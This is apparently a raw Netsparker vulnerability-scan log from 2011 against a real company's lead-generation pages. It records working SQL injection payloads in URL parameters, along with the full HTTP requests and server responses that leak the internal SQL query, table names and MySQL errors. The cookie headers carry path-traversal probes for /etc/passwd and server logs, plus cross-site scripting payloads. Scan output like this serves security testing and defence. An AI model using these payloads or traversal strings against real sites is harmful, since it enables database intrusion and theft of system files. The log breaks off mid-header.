select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/cace00/project.php

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3bbbi1f23mkeoo56djlte5l3t0; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/incn00/project.php

http://www.insideup.com/ppc/leadflow/incn00/project.php?catId='%2B%20convert(int,(CHAR(95)%2BCHAR(33..

Parameters

Parameter Type Value
catId GET '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/incn00/project.php?catId='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qcttka2crouqvm8lqfcj6fn9o7; path=/
Content-Length: 3913
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR 
prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 5
- /ppc/leadflow/fist00/project.php

/ppc/leadflow/fist00/project.php

http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc='%7C%7Ccast((select%20chr(..

Parameters

Parameter Type Value
catId GET 10003
iusrc GET '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

Request

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
